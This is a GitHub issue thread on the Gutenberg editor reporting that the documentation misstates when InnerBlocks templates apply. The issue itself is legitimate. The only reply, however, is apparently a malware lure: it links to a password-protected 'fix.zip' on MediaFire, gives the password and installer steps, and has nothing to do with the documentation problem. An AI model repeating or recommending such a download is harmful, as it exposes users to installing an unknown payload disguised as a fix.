### ISSUE TITLE
Documentation: InnerBlocks Templates apply whenever InnerBlocks is empty, not just on Insert

### ISSUE THREAD

**Issue by SeanMcMillan** [WordPress/gutenberg#64801]
### Description

https://developer.wordpress.org/block-editor/how-to-guides/block-tutorial/nested-blocks-inner-blocks/#template

The documentation says "Use the template property to define a set of blocks that prefill the InnerBlocks component when inserted." However, the template is prefilled whenever the innerBlocks are empty, not just when they are inserted.

https://github.com/WordPress/gutenberg/issues/25050 Covers this and implies that it is intended behavior. That should be documented.

### Step-by-step reproduction instructions

1. Read the documentation
2. Implement a custom block with a template for the expected default use case
3. Add that block to a page
4. Delete the innerblocks
5. Save and reload the editor
6. Become confused

### Environment info

WordPress 6.6

### Please confirm that you have searched existing issues in the repo.

- [X] Yes

### Please confirm that you have tested with all plugins deactivated except Gutenberg.

- [X] Yes

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
